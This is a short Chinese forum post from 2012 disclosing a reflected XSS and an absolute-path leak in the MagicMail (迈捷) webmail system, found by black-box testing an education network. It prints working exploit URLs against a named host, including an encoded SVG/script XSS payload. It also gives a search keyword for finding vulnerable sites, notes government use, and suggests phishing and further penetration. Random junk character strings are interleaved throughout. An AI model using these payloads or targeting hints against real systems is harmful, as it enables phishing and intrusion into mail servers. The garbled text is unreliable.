今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞2 w* l( i& I/ x+ n# }! z* T% L
/ {8 ~( }" b& } l4 E
' F8 g- o8 H; K6 B8 S; [8 u包含 一个反射性XSS 以及 绝对路径泄漏, k5 F0 X' U) z7 U$ k
看了看 貌似全部是linux的。
9 }9 \* m5 F' X8 h
8 A) w- v4 x" ]关键字:迈捷邮件系统 by MagicMail
+ v \0 @# Y7 L* ~# X' g5 V. i$ _# z% t/ K7 H! p
可以看到很多政府网站都用这个邮件系统& m: U- w' m, }" z1 o
6 y: t g1 u% P绝对路径 http://madman.in/index.php?login_type=declare&language=, \! \5 }. x6 Y% [! J8 ~" U
8 B5 C% t7 R4 x8 p! N
, _0 k; O+ ~4 h1 A, L
+ ^" K5 ^% M$ P- L2 Z% h1 G: OXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E; l) `% b J! y* w/ |4 Q) f
' X: j. B( p. m( ]& v! h. ^( t, d6 g- Q+ i
1 u+ o+ ~, Y8 t! c2 c2 f
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
& z( t p ~2 o$ l 1 d/ l- h) ]* J0 ]3 G9 O
修复方案:看官方补丁吧。9 A4 Z: u4 X* N3 r" T2 Y( h
|
发表于 2012-11-9 20:38:41
收藏
支持
反对